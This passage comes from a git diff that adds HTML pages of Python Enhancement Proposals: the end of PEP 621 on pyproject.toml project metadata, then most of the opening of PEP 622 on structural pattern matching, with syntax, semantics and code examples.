+name = "spam"
+version = "2020.0.0"
+description = "Lovely Spam! Wonderful Spam!"
+readme = "README.rst"
+requires-python = ">=3.8"
+license = {file = "LICENSE.txt"}
+keywords = ["egg", "bacon", "sausage", "tomatoes", "Lobster Thermidor"]
+authors = [
+  {email = "hi@pradyunsg.me"},
+  {name = "Tzu-ping Chung"}
+]
+maintainers = [
+  {name = "Brett Cannon", email = "brett@python.org"}
+]
+classifiers = [
+  "Development Status :: 4 - Beta",
+  "Programming Language :: Python"
+]
+
+dependencies = [
+  "httpx",
+  "gidgethub[httpx]>4.0.0",
+  "django>2.1; os_name != 'nt'",
+  "django>2.0; os_name == 'nt'"
+]
+
+[project.optional-dependencies]
+test = [
+  "pytest < 5.0.0",
+  "pytest-cov[all]"
+]
+
+[project.urls]
+homepage = "https://example.com"
+documentation = "https://readthedocs.org"
+repository = "https://github.com"
+changelog = "https://github.com/me/spam/blob/master/CHANGELOG.md"
+
+[project.scripts]
+spam-cli = "spam:main_cli"
+
+[project.gui-scripts]
+spam-gui = "spam:main_gui"
+
+[project.entry-points."spam.magical"]
+tomatoes = "spam:main_tomatoes"
+
+
+
+
+
+

Backwards Compatibility

+

As this provides a new way to specify a project’s core metadata and +is using a new table name which falls under the reserved namespace as +outlined in PEP 518, there are no backwards-compatibility concerns.

+
+
+

Security Implications

+

There are no direct security concerns as this PEP covers how to +statically define project metadata. Any security issues would stem +from how tools consume the metadata and choose to act upon it.

+
+
+

Reference Implementation

+

There are currently no proofs-of-concept from any build back-end +implementing this PEP.

+
+
+

Rejected Ideas

+
+

Other table names

+
+

Anything under [build-system]

+

There was worry that using this table name would exacerbate confusion +between build metadata and project metadata, e.g. by using +[build-system.metadata] as a table.

+
+
+

[package]

+

Garnered no strong support.

+
+
+

[metadata]

+

The strongest contender after [project], but in the end it was +agreed that [project] read better for certain sub-tables, e.g. +[project.urls].

+
+
+
+

Support for a metadata provider

+

Initially there was a proposal to add a middle layer between the +static metadata specified by this PEP and +prepare_metadata_for_build_wheel() as specified by PEP 517. The +idea was that if a project wanted to insert itself between a build +back-end and the metadata there would be a hook to do so.

+

In the end the authors considered this idea unnecessarily complicated +and would move the PEP away from its design goal to push people to +define core metadata statically as much as possible.

+
+
+

Require a normalized project name

+

While it would make things easier for tools to only work with the +normalized name as specified in PEP 503, the idea was ultimately +rejected as it would hurt projects transitioning to using this PEP.

+
+
+

Specify files to include when building

+

The authors decided fairly quickly during design discussions that +this PEP should focus exclusively on project metadata and not build +metadata. As such, specifying what files should end up in a source +distribution or wheel file is out of scope for this PEP.

+
+
+

Name the [project.urls] table [project.project-urls]

+

This suggestion came thanks to the corresponding core metadata +being Project-Url. But once the overall table name of [project] +was chosen, the redundant use of the word “project” suggested the +current, shorter name was a better fit.

+
+
+

Have a separate url/home-page field

+

While the core metadata supports it, having a single field for a +project’s URL while also supporting a full table seemed redundant and +confusing.

+
+ +
+

Have the dynamic field only require specifying missing required fields

+

The authors considered the idea that the dynamic field would only +require the listing of missing required fields and make listing +optional fields optional. In the end, though, this went against the +design goal of promoting specifying as much information statically as +possible.

+
+
+

Different structures for the readme field

+

The readme field had a proposed readme_content_type field, but +the authors considered the string/table hybrid more practical for the +common case while still accommodating the more complex case. Same goes +for using long_description and a corresponding +long_description_content_type field.

+

The file key in the table format was originally proposed as +path, but file corresponds to setuptools’ file key and +there is no strong reason otherwise to choose one over the other.

+
+
+

Allowing the readme field to imply text/plain

+

The authors considered allowing for unspecified content-types which +would default to text/plain, but decided that it would be best to +be explicit in this case to prevent accidental incorrect renderings on +PyPI and to force users to be clear in their intent.

+
+
+

Other names for dependencies/optional-dependencies

+

The authors originally proposed requires/extra-requires as +names, but decided to go with the current names after a survey of +other packaging ecosystems showed Python was an outlier:

+
    +
  1. npm
  2. +
  3. Rust
  4. +
  5. Dart
  6. +
  7. Swift
  8. +
  9. Ruby
  10. +
+

Normalizing on the current names helps minimize confusion for people coming from +other ecosystems without using terminology that is necessarily foreign to new +programmers. It also prevents potential confusion with requires in the +[build-system] table as specified in PEP 518.

+
+
+

Drop maintainers to unify with authors

+

As the difference between Authors and Maintainers fields in +the core metadata is unspecified and ambiguous, this PEP originally +proposed unifying them as a single authors field. Other ecosystems +have selected “author” as the term to use, so the thinking was to +standardize on Author in the core metadata as the place to list +people maintaining a project.

+

In the end, though, the decision to adhere to the core metadata was +deemed more important to help with the acceptance of this PEP, +rather than trying to introduce a new interpretation for some of the +core metadata.

+
+
+

Support an arbitrary depth of tables for project.entry-points

+

There was a worry that keeping project.entry-points to a depth of 1 for sub-tables +would cause confusion to users if they use a dotted name and are not used to table +names using quotation marks (e.g. project.entry-points."spam.magical"). But +supporting an arbitrary depth – e.g. project.entry-points.spam.magical – would +preclude any form of an exploded table format in the future. It would also complicate +things for build back-ends as they would have to make sure to traverse the full +table structure rather than a single level and raising errors as appropriate on +value types.

+
+
+

Using structured TOML dictionaries to specify dependencies

+

The format for specifying the dependencies of a project was the most +hotly contested topic in terms of data format. It led to the creation +of both PEP 631 and PEP 633 which represent what is in this PEP +and using TOML dictionaries more extensively, respectively. The +decision on those PEPs can be found at +https://discuss.python.org/t/how-to-specify-dependencies-pep-508-strings-or-a-table-in-toml/5243/38.

+

The authors briefly considered supporting both formats, but decided +that it would lead to confusion as people would need to be familiar +with two formats instead of just one.

+
+
+

Require build back-ends to update pyproject.toml when generating an sdist

+

When this PEP was written, sdists did not require having static, +canonical metadata like this PEP does. The idea was then considered to +use this PEP as a way to get such metadata into sdists. In the end, +though, the idea of updating pyproject.toml was not generally +liked, and so the idea was rejected in favour of separately pursuing +standardizing metadata in sdists.

+
+
+

Allow tools to add/extend data

+

In an earlier version of this PEP, tools were allowed to extend data +for fields. For instance, build back-ends could take the version +number and add a local version for when they built the wheel. Tools +could also add more trove classifiers for things like the license or +supported Python versions.

+

In the end, though, it was thought better to start out stricter and +contemplate loosening how static the data could be considered based +on real-world usage.

+
+
+
+

Open Issues

+

None at the moment.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0621.rst

+

Last modified: 2023-12-06 16:17:05 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0622/index.html b/pep-0622/index.html new file mode 100644 index 00000000000..6f36bad5080 --- /dev/null +++ b/pep-0622/index.html @@ -0,0 +1,2329 @@ + + + + + + + + PEP 622 – Structural Pattern Matching | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 622 – Structural Pattern Matching

+
+
Author:
+
Brandt Bucher <brandt at python.org>, +Daniel F Moisset <dfmoisset at gmail.com>, +Tobias Kohn <kohnt at tobiaskohn.ch>, +Ivan Levkivskyi <levkivskyi at gmail.com>, +Guido van Rossum <guido at python.org>, +Talin <viridia at gmail.com>
+
BDFL-Delegate:
+

+
Discussions-To:
+
Python-Dev list
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Created:
+
23-Jun-2020
+
Python-Version:
+
3.10
+
Post-History:
+
23-Jun-2020, 08-Jul-2020
+
Superseded-By:
+
634
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to add a pattern matching statement to Python, +inspired by similar syntax found in Scala, Erlang, and other languages.

+
+

Patterns and shapes

+

The pattern syntax builds on Python’s existing syntax for sequence +unpacking (e.g., a, b = value).

+

A match statement compares a value (the subject) +to several different shapes (the patterns) until a shape fits. +Each pattern describes the type and structure of the accepted values +as well as the variables where to capture its contents.

+

Patterns can specify the shape to be:

+
    +
  • a sequence to be unpacked, as already mentioned
  • +
  • a mapping with specific keys
  • +
  • an instance of a given class with (optionally) specific attributes
  • +
  • a specific value
  • +
  • a wildcard
  • +
+

Patterns can be composed in several ways.

+
+
+

Syntax

+

Syntactically, a match statement contains:

+
    +
  • a subject expression
  • +
  • one or more case clauses
  • +
+

Each case clause specifies:

+
    +
  • a pattern (the overall shape to be matched)
  • +
  • an optional “guard” (a condition to be checked if the pattern matches)
  • +
  • a code block to be executed if the case clause is selected
  • +
+
+
+

Motivation

+

The rest of the PEP:

+
    +
  • motivates why we believe pattern matching makes a good addition to Python
  • +
  • explains our design choices
  • +
  • contains a precise syntactic and runtime specification
  • +
  • gives guidance for static type checkers (and one small addition to the typing module)
  • +
  • discusses the main objections and alternatives that have been +brought up during extensive discussion of the proposal, both within +the group of authors and in the python-dev community
  • +
+

Finally, we discuss some possible extensions that might be considered +in the future, once the community has ample experience with the +currently proposed syntax and semantics.

+
+
+
+

Overview

+

Patterns are a new syntactical category with their own rules +and special cases. Patterns mix input (given values) and output +(captured variables) in novel ways. They may take a little time to +use effectively. The authors have provided +a brief introduction to the basic concepts here. Note that this section +is not intended to be complete or entirely accurate.

+
+

Pattern, a new syntactic construct, and destructuring

+

A new syntactic construct called pattern is introduced in this +PEP. Syntactically, patterns look like a subset of expressions. +The following are examples of patterns:

+
    +
  • [first, second, *rest]
  • +
  • Point2d(x, 0)
  • +
  • {"name": "Bruce", "age": age}
  • +
  • 42
  • +
+

The above expressions may look like examples of object construction +with a constructor which takes some values as parameters and +builds an object from those components.

+

When viewed as a pattern, the above patterns mean the inverse operation of +construction, which we call destructuring. Destructuring takes a subject value +and extracts its components.

+

The syntactic similarity between object construction and destructuring is +intentional. It also follows the existing +Pythonic style of contexts which makes assignment targets (write contexts) look +like expressions (read contexts).

+

Pattern matching never creates objects. This is in the same way that +[a, b] = my_list doesn’t create a +new [a, b] list, nor reads the values of a and b.

+
+
+

Matching process

+

During this matching process, +the structure of the pattern may not fit the subject, and matching fails.

+

For example, matching the pattern Point2d(x, 0) to the subject +Point2d(3, 0) successfully matches. The match also binds +the pattern’s free variable x to the subject’s value 3.

+

As another example, if the subject is [3, 0], the match fails +because the subject’s type list is not the pattern’s Point2d.

+

As a third example, if the subject is +Point2d(3, 7), the match fails because the +subject’s second coordinate 7 is not the same as the pattern’s 0.

+

The match statement tries to match a single subject to each of the +patterns in its case clauses. At the first +successful match to a pattern in a case clause:

+
    +
  • the variables in the pattern are assigned, and
  • +
  • a corresponding block is executed.
  • +
+

Each case clause can also specify an optional boolean condition, +known as a guard.

+

Let’s look at a more detailed example of a match statement. The +match statement is used within a function to define the building +of 3D points. In this example, the function can accept as input any of +the following: tuple with 2 elements, tuple with 3 elements, an +existing Point2d object or an existing Point3d object:

+
def make_point_3d(pt):
+    match pt:
+        case (x, y):
+            return Point3d(x, y, 0)
+        case (x, y, z):
+            return Point3d(x, y, z)
+        case Point2d(x, y):
+            return Point3d(x, y, 0)
+        case Point3d(_, _, _):
+            return pt
+        case _:
+            raise TypeError("not a point we support")
+
+
+

Without pattern matching, this function’s implementation would require several +isinstance() checks, one or two len() calls, and a more +convoluted control flow. The match example version and the traditional +Python version without match translate into similar code under the hood. +With familiarity of pattern matching, a user reading this function using match +will likely find this version clearer than the traditional approach.

+
+
+
+

Rationale and Goals

+

Python programs frequently need to handle data which varies in type, +presence of attributes/keys, or number of elements. Typical examples +are operating on nodes of a mixed structure like an AST, handling UI +events of different types, processing structured input (like +structured files or network messages), or “parsing” arguments for a +function that can accept different combinations of types and numbers +of parameters. In fact, the classic ‘visitor’ pattern is an example of this, +done in an OOP style – but matching makes it much less tedious to write.

+

Much of the code to do so tends to consist of complex chains of nested +if/elif statements, including multiple calls to len(), +isinstance() and index/key/attribute access. Inside those branches +users sometimes need to destructure the data further to extract the +required component values, which may be nested several objects deep.

+

Pattern matching as present in many other languages provides an +elegant solution to this problem. These range from statically compiled +functional languages like F# and Haskell, via mixed-paradigm languages +like Scala and Rust, to dynamic languages like Elixir and +Ruby, and is under consideration for JavaScript. We are indebted to +these languages for guiding the way to Pythonic pattern matching, as +Python is indebted to so many other languages for many of its +features: many basic syntactic features were inherited from C, +exceptions from Modula-3, classes were inspired by C++, slicing came +from Icon, regular expressions from Perl, decorators resemble Java +annotations, and so on.

+

The usual logic for operating on heterogeneous data can be summarized +in the following way:

+
    +
  • Some analysis is done on the shape (type and components) of the +data: This could involve isinstance() or len() calls and/or extracting +components (via indexing or attribute access) which are checked for +specific values or conditions.
  • +
  • If the shape is as expected, some more components are possibly +extracted and some operation is done using the extracted values.
  • +
+

Take for example this piece of the Django web framework:

+
if (
+    isinstance(value, (list, tuple)) and
+    len(value) > 1 and
+    isinstance(value[-1], (Promise, str))
+):
+    *value, label = value
+    value = tuple(value)
+else:
+    label = key.replace('_', ' ').title()
+
+
+

We can see the shape analysis of the value at the top, following +by the destructuring inside.

+

Note that shape analysis here involves checking the types both of the +container and of one of its components, and some checks on its number +of elements. Once we match the shape, we need to decompose the +sequence. With the proposal in this PEP, we could rewrite that code +into this:

+
match value:
+    case [*v, label := (Promise() | str())] if v:
+        value = tuple(v)
+    case _:
+        label = key.replace('_', ' ').title()
+
+
+

This syntax makes much more explicit which formats are possible for +the input data, and which components are extracted from where. You can +see a pattern similar to list unpacking, but also type checking: the +Promise() pattern is not an object construction, but represents +anything that’s an instance of Promise. The pattern operator | +separates alternative patterns (not unlike regular expressions or EBNF +grammars), and _ is a wildcard. (Note that the match syntax used +here will accept user-defined sequences, as well as lists and tuples.)

+

In some occasions, extraction of information is not as relevant as +identifying structure. Take the following example from the +Python standard library:

+
def is_tuple(node):
+    if isinstance(node, Node) and node.children == [LParen(), RParen()]:
+        return True
+    return (isinstance(node, Node)
+            and len(node.children) == 3
+            and isinstance(node.children[0], Leaf)
+            and isinstance(node.children[1], Node)
+            and isinstance(node.children[2], Leaf)
+            and node.children[0].value == "("
+            and node.children[2].value == ")")
+
+
+

This example shows an example of finding out the “shape” of the data +without doing significant extraction. This code is not very easy to +read, and the intended shape that this is trying to match is not +evident. Compare with the updated code using the proposed syntax:

+
def is_tuple(node: Node) -> bool:
+    match node:
+        case Node(children=[LParen(), RParen()]):
+            return True
+        case Node(children=[Leaf(value="("), Node(), Leaf(value=")")]):
+            return True
+        case _:
+            return False
+
+
+

Note that the proposed code will work without any modifications to the +definition of Node and other classes here. As shown in the +examples above, the proposal supports not just unpacking sequences, but +also doing isinstance checks (like LParen() or str()), +looking into object attributes (Leaf(value="(") for example) and +comparisons with literals.

+

That last feature helps with some kinds of code which look more like +the “switch” statement as present in other languages:

+
match response.status:
+    case 200:
+        do_something(response.data)  # OK
+    case 301 | 302:
+        retry(response.location)  # Redirect
+    case 401:
+        retry(auth=get_credentials())  # Login first
+    case 426:
+        sleep(DELAY)  # Server is swamped, try after a bit
+        retry()
+    case _:
+        raise RequestError("we couldn't get the data")
+
+
+

Although this will work, it’s not necessarily what the proposal is +focused on, and the new syntax has been designed to best support the +destructuring scenarios.

+

See the syntax sections below +for a more detailed specification.

+

We propose that destructuring objects can be customized by a new +special __match_args__ attribute. As part of this PEP we specify +the general API and its implementation for some standard library +classes (including named tuples and dataclasses). See the runtime section below.

+

Finally, we aim to provide comprehensive support for static type +checkers and similar tools. For this purpose, we propose to introduce +a @typing.sealed class decorator that will be a no-op at runtime +but will indicate to static tools that all sub-classes of this class +must be defined in the same module. This will allow effective static +exhaustiveness checks, and together with dataclasses, will provide +basic support for algebraic data types. See the static checkers section for more details.

+
+
+

Syntax and Semantics

+
+

Patterns

+

The pattern is a new syntactic construct, that could be considered a loose +generalization of assignment targets. The key properties of a pattern are what +types and shapes of subjects it accepts, what variables it captures and how +it extracts them from the subject. For example, the pattern [a, b] matches +only sequences of exactly 2 elements, extracting the first element into a +and the second one into b.

+

This PEP defines several types of patterns. These are certainly not the +only possible ones, so the design decision was made to choose a subset of +functionality that is useful now but conservative. More patterns can be added +later as this feature gets more widespread use. See the rejected ideas +and deferred ideas sections for more details.

+

The patterns listed here are described in more detail below, but summarized +together in this section for simplicity:

+
    +
  • A literal pattern is useful to filter constant values in a structure. +It looks like a Python literal (including some values like True, +False and None). It only matches objects equal to the literal, and +never binds.
  • +
  • A capture pattern looks like x and is equivalent to an identical +assignment target: it always matches and binds the variable +with the given (simple) name.
  • +
  • The wildcard pattern is a single underscore: _. It always matches, +but does not capture any variable (which prevents interference with other +uses for _ and allows for some optimizations).
  • +
  • A constant value pattern works like the literal but for certain named +constants. Note that it must be a qualified (dotted) name, given the possible +ambiguity with a capture pattern. It looks like Color.RED and +only matches values equal to the corresponding value. It never binds.
  • +
  • A sequence pattern looks like [a, *rest, b] and is similar to +a list unpacking. An important difference is that the elements nested +within it can be any kind of patterns, not just names or sequences. +It matches only sequences of appropriate length, as long as all the sub-patterns +also match. It makes all the bindings of its sub-patterns.
  • +
  • A mapping pattern looks like {"user": u, "emails": [*es]}. It matches +mappings with at least the set of provided keys, and if all the +sub-patterns match their corresponding values. It binds whatever the +sub-patterns bind while matching with the values corresponding to the keys. +Adding **rest at the end of the pattern to capture extra items is allowed.
  • +
  • A class pattern is similar to the above but matches attributes instead +of keys. It looks like datetime.date(year=y, day=d). It matches +instances of the given type, having at least the specified +attributes, as long as the attributes match with the corresponding +sub-patterns. It binds whatever the sub-patterns bind when matching with the +values of +the given attributes. An optional protocol also allows matching positional +arguments.
  • +
  • An OR pattern looks like [*x] | {"elems": [*x]}. It matches if any +of its sub-patterns match. It uses the binding for the leftmost pattern +that matched.
  • +
  • A walrus pattern looks like d := datetime(year=2020, month=m). It +matches only +if its sub-pattern also matches. It binds whatever the sub-pattern match does, and +also binds the named variable to the entire object.
  • +
+
+
+

The match statement

+

A simplified, approximate grammar for the proposed syntax is:

+
...
+compound_statement:
+    | if_stmt
+    ...
+    | match_stmt
+match_stmt: "match" expression ':' NEWLINE INDENT case_block+ DEDENT
+case_block: "case" pattern [guard] ':' block
+guard: 'if' expression
+pattern: walrus_pattern | or_pattern
+walrus_pattern: NAME ':=' or_pattern
+or_pattern: closed_pattern ('|' closed_pattern)*
+closed_pattern:
+    | literal_pattern
+    | capture_pattern
+    | wildcard_pattern
+    | constant_pattern
+    | sequence_pattern
+    | mapping_pattern
+    | class_pattern
+
+
+

See Appendix A for the full, unabridged grammar. +The simplified grammars in this section are there for helping the reader, +not as a full specification.

+

We propose that the match operation should be a statement, not an expression. +Although in +many languages it is an expression, being a statement better suits the general +logic of Python syntax. See rejected ideas for more discussion. +The allowed patterns are described in detail below in the patterns subsection.

+

The match and case keywords are proposed to be soft keywords, +so that they are recognized as keywords at the beginning of a match +statement or case block respectively, but are allowed to be used in +other places as variable or argument names.

+

The proposed indentation structure is as following:

+
match some_expression:
+    case pattern_1:
+        ...
+    case pattern_2:
+        ...
+
+
+

Here, some_expression represents the value that is being matched against, +which will be referred to hereafter as the subject of the match.

+
+
+

Match semantics

+

The proposed large scale semantics for choosing the match is to choose the first +matching pattern and execute the corresponding suite. The remaining patterns +are not tried. If there are no matching patterns, the statement ‘falls +through’, and execution continues at the following statement.

+

Essentially this is equivalent to a chain of if ... elif ... else +statements. Note that unlike for the previously proposed switch statement, +the pre-computed dispatch dictionary semantics does not apply here.

+

There is no default or else case - instead the special wildcard +_ can be used (see the section on capture_pattern) +as a final ‘catch-all’ pattern.

+

Name bindings made during a successful pattern match outlive the executed suite +and can be used after the match statement. This follows the logic of other +Python statements that can bind names, such as for loop and with +statement. For example:

+
match shape:
+    case Point(x, y):
+        ...
+    case Rectangle(x, y, _, _):
+        ...
+print(x, y)  # This works
+
+
+

During failed pattern matches, some sub-patterns may succeed. For example, +while matching the value [0, 1, 2] with the pattern (0, x, 1), the +sub-pattern x may succeed if the list elements are matched from left to right. +The implementation may choose to either make persistent bindings for those +partial matches or not. User code including a match statement should not rely +on the bindings being made for a failed match, but also shouldn’t assume that +variables are unchanged by a failed match. This part of the behavior is +left intentionally unspecified so different implementations can add +optimizations, and to prevent introducing semantic restrictions that could +limit the extensibility of this feature.

+

Note that some pattern types below define more specific rules about when +the binding is made.

+
+
+

Allowed patterns

+

We introduce the proposed syntax gradually. Here we start from the main +building blocks. The following patterns are supported:

+
+

Literal Patterns

+

Simplified syntax:

+
literal_pattern:
+    | number
+    | string
+    | 'None'
+    | 'True'
+    | 'False'
+
+
+

A literal pattern consists of a simple literal like a string, a number, +a Boolean literal (True or False), or None:

+
match number:
+    case 0:
+        print("Nothing")
+    case 1:
+        print("Just one")
+    case 2:
+        print("A couple")
+    case -1:
+        print("One less than nothing")
+    case 1-1j:
+        print("Good luck with that...")
+
+
+

Literal pattern uses equality with literal on the right hand side, so that +in the above example number == 0 and then possibly number == 1, etc +will be evaluated. Note that although technically negative numbers +are represented using unary minus, they are considered +literals for the purpose of pattern matching. Unary plus is not allowed. +Binary plus and minus are allowed only to join a real number and an imaginary +number to form a complex number, such as 1+1j.

+

Note that because equality (__eq__) is used, and the equivalency +between Booleans and the integers 0 and 1, there is no +practical difference between the following two:

+
case True:
+    ...
+
+case 1:
+    ...
+
+
+

Triple-quoted strings are supported. Raw strings and byte strings +are supported. F-strings are not allowed (since in general they are not +really literals).

+
+
+

Capture Patterns

+

Simplified syntax:

+
capture_pattern: NAME
+
+
+

A capture pattern serves as an assignment target for the matched expression:

+
match greeting:
+    case "":
+        print("Hello!")
+    case name:
+        print(f"Hi {name}!")
+
+
+

Only a single name is allowed (a dotted name is a constant value pattern). +A capture pattern always succeeds. A capture pattern appearing in a scope makes +the name local to that scope. For example, using name after the above +snippet may raise UnboundLocalError rather than NameError, if +the "" case clause was taken:

+
match greeting:
+    case "":
+        print("Hello!")
+    case name:
+        print(f"Hi {name}!")
+if name == "Santa":      # <-- might raise UnboundLocalError
+    ...                  # but works fine if greeting was not empty
+
+
+

While matching against each case clause, a name may be bound at most +once, having two capture patterns with coinciding names is an error:

+
match data:
+    case [x, x]:  # Error!
+        ...
+
+
+

Note: one can still match on a collection with equal items using guards. +Also, [x, y] | Point(x, y) is a legal pattern because the two +alternatives are never matched at the same time.

+

The single underscore (_) is not considered a NAME and treated specially +as a wildcard pattern.

+

Reminder: None, False and True are keywords denoting +literals, not names.

+
+
+

Wildcard Pattern

+

Simplified syntax:

+
wildcard_pattern: "_"
+
+
+

The single underscore (_) name is a special kind of pattern that always +matches but never binds:

+
match data:
+    case [_, _]:
+        print("Some pair")
+        print(_)  # Error!
+
+
+

Given that no binding is made, it can be used as many times as desired, unlike +capture patterns.

+
+
+

Constant Value Patterns

+

Simplified syntax:

+
constant_pattern: NAME ('.' NAME)+
+
+
+

This is used to match against constants and enum values. +Every dotted name in a pattern is looked up using normal Python name +resolution rules, and the value is used for comparison by equality with +the match subject (same as for literals):

+
from enum import Enum
+
+class Sides(str, Enum):
+    SPAM = "Spam"
+    EGGS = "eggs"
+    ...
+
+match entree[-1]:
+    case Sides.SPAM:  # Compares entree[-1] == Sides.SPAM.
+        response = "Have you got anything without Spam?"
+    case side:  # Assigns side = entree[-1].
+        response = f"Well, could I have their Spam instead of the {side} then?"
+
+
+

Note that there is no way to use unqualified names as constant value +patterns (they always denote variables to be captured). See +rejected ideas for other syntactic alternatives that were +considered for constant value patterns.

+
+
+

Sequence Patterns

+

Simplified syntax:

+
sequence_pattern:
+    | '[' [values_pattern] ']'
+    | '(' [value_pattern ',' [values pattern]] ')'
+values_pattern: ','.value_pattern+ ','?
+value_pattern: '*' capture_pattern | pattern
+
+
+

A sequence pattern follows the same semantics as unpacking assignment. +Like unpacking assignment, both tuple-like and list-like syntax can be +used, with identical semantics. Each element can be an arbitrary +pattern; there may also be at most one *name pattern to catch all +remaining items:

+
match collection:
+    case 1, [x, *others]:
+        print("Got 1 and a nested sequence")
+    case (1, x):
+        print(f"Got 1 and {x}")
+
+
+

To match a sequence pattern the subject must be an instance of +collections.abc.Sequence, and it cannot be any kind of string +(str, bytes, bytearray). It cannot be an iterator. For matching +on a specific collection class, see class pattern below.

+

The _ wildcard can be starred to match sequences of varying lengths. For +example:

+
    +
  • [*_] matches a sequence of any length.
  • +
  • (_, _, *_), matches any sequence of length two or more.
  • +
  • ["a", *_, "z"] matches any sequence of length two or more that starts with +"a" and ends with "z".
  • +
+
+
+

Mapping Patterns

+

Simplified syntax:

+
mapping_pattern: '{' [items_pattern] '}'
+items_pattern: ','.key_value_pattern+ ','?
+key_value_pattern:
+    | (literal_pattern | constant_pattern) ':' or_pattern
+    | '**' capture_pattern
+
+
+

Mapping pattern is a generalization of iterable unpacking to mappings. +Its syntax is similar to dictionary display but each key and value are +patterns "{" (pattern ":" pattern)+ "}". A **rest pattern is also +allowed, to extract the remaining items. Only literal and constant value +patterns are allowed in key positions:

+
import constants
+
+match config:
+    case {"route": route}:
+        process_route(route)
+    case {constants.DEFAULT_PORT: sub_config, **rest}:
+        process_config(sub_config, rest)
+
+
+

The subject must be an instance of collections.abc.Mapping. +Extra keys in the subject are ignored even if **rest is not present. +This is different from sequence pattern, where extra items will cause a +match to fail. But mappings are actually different from sequences: they +have natural structural sub-typing behavior, i.e., passing a dictionary +with extra keys somewhere will likely just work.

+

For this reason, **_ is invalid in mapping patterns; it would always be a +no-op that could be removed without consequence.

+

Matched key-value pairs must already be present in the mapping, and not created +on-the-fly by __missing__ or __getitem__. For example, +collections.defaultdict instances will only match patterns with keys that +were already present when the match block was entered.

+
+
+

Class Patterns

+

Simplified syntax:

+
class_pattern:
+    | name_or_attr '(' ')'
+    | name_or_attr '(' ','.pattern+ ','? ')'
+    | name_or_attr '(' ','.keyword_pattern+ ','? ')'
+    | name_or_attr '(' ','.pattern+ ',' ','.keyword_pattern+ ','? ')'
+keyword_pattern: NAME '=' or_pattern
+
+
+

A class pattern provides support for destructuring arbitrary objects. +There are two possible ways of matching on object attributes: by position +like Point(1, 2), and by name like Point(x=1, y=2). These +two can be combined, but a positional match cannot follow a match by name. +Each item in a class pattern can be an arbitrary pattern. A simple +example:

+
match shape:
+    case Point(x, y):
+        ...
+    case Rectangle(x0, y0, x1, y1, painted=True):
+        ...
+
+
+

Whether a match succeeds or not is determined by the equivalent of an +isinstance call. If the subject (shape, in the example) is not +an instance of the named class (Point or Rectangle), the match +fails. Otherwise, it continues (see details in the runtime section).

+

The named class must inherit from type. It may be a single name +or a dotted name (e.g. some_mod.SomeClass or mod.pkg.Class). +The leading name must not be _, so e.g. _(...) and +_.C(...) are invalid. Use object(foo=_) to check whether the +matched object has an attribute foo.

+

By default, sub-patterns may only be matched by keyword for +user-defined classes. In order to support positional sub-patterns, a +custom __match_args__ attribute is required. +The runtime allows matching against +arbitrarily nested patterns by chaining all of the instance checks and +attribute lookups appropriately.

+
+
+
+

Combining multiple patterns (OR patterns)

+

Multiple alternative patterns can be combined into one using |. This means +the whole pattern matches if at least one alternative matches. +Alternatives are tried from left to right and have a short-circuit property, +subsequent patterns are not tried if one matched. Examples:

+
match something:
+    case 0 | 1 | 2:
+        print("Small number")
+    case [] | [_]:
+        print("A short sequence")
+    case str() | bytes():
+        print("Something string-like")
+    case _:
+        print("Something else")
+
+
+

The alternatives may bind variables, as long as each alternative binds +the same set of variables (excluding _). For example:

+
match something:
+    case 1 | x:  # Error!
+        ...
+    case x | 1:  # Error!
+        ...
+    case one := [1] | two := [2]:  # Error!
+        ...
+    case Foo(arg=x) | Bar(arg=x):  # Valid, both arms bind 'x'
+        ...
+    case [x] | x:  # Valid, both arms bind 'x'
+        ...
+
+
+
+
+

Guards

+

Each top-level pattern can be followed by a guard of the form +if expression. A case clause succeeds if the pattern matches and the guard +evaluates to a true value. For example:

+
match input:
+    case [x, y] if x > MAX_INT and y > MAX_INT:
+        print("Got a pair of large numbers")
+    case x if x > MAX_INT:
+        print("Got a large number")
+    case [x, y] if x == y:
+        print("Got equal items")
+    case _:
+        print("Not an outstanding input")
+
+
+

If evaluating a guard raises an exception, it is propagated onwards rather +than fail the case clause. Names that appear in a pattern are bound before the +guard succeeds. So this will work:

+
values = [0]
+
+match values:
+    case [x] if x:
+        ...  # This is not executed
+    case _:
+        ...
+print(x)  # This will print "0"
+
+
+

Note that guards are not allowed for nested patterns, so that [x if x > 0] +is a SyntaxError and 1 | 2 if 3 | 4 will be parsed as +(1 | 2) if (3 | 4).

+
+
+

Walrus patterns

+

It is often useful to match a sub-pattern and bind the corresponding +value to a name. For example, it can be useful to write more efficient +matches, or simply to avoid repetition. To simplify such cases, any pattern +(other than the walrus pattern itself) can be preceded by a name and +the walrus operator (:=). For example:

+
match get_shape():
+    case Line(start := Point(x, y), end) if start == end:
+        print(f"Zero length line at {x}, {y}")
+
+
+

The name on the left of the walrus operator can be used in a guard, in +the match suite, or after the match statement. However, the name will +only be bound if the sub-pattern succeeds. Another example:

+
match group_shapes():
+    case [], [point := Point(x, y), *other]:
+        print(f"Got {point} in the second group")
+        process_coordinates(x, y)
+        ...
+
+
+

Technically, most such examples can be rewritten using guards and/or nested +match statements, but this will be less readable and/or will produce less +efficient code. Essentially, most of the arguments in PEP 572 apply here +equally.

+

The wildcard _ is not a valid name here.

+
+
+
+

Runtime specification

+
+

The Match Protocol

+

The equivalent of an isinstance call is used to decide whether an +object matches a given class pattern and to extract the corresponding +attributes. Classes requiring different matching semantics (such as +duck-typing) can do so by defining __instancecheck__ (a +pre-existing metaclass hook) or by using typing.Protocol.

+

The procedure is as following:

+
    +
  • The class object for Class in Class(<sub-patterns>) is +looked up and isinstance(obj, Class) is called, where obj is +the value being matched. If false, the match fails.
  • +
  • Otherwise, if any sub-patterns are given in the form of positional +or keyword arguments, these are matched from left to right, as +follows. The match fails as soon as a sub-pattern fails; if all +sub-patterns succeed, the overall class pattern match succeeds.
  • +
  • If there are match-by-position items and the class has a +__match_args__ attribute, the item at position i +is matched against the value looked up by attribute +__match_args__[i]. For example, a pattern Point2d(5, 8), +where Point2d.__match_args__ == ["x", "y"], is translated +(approximately) into obj.x == 5 and obj.y == 8.
  • +
  • If there are more positional items than the length of +__match_args__, a TypeError is raised.
  • +
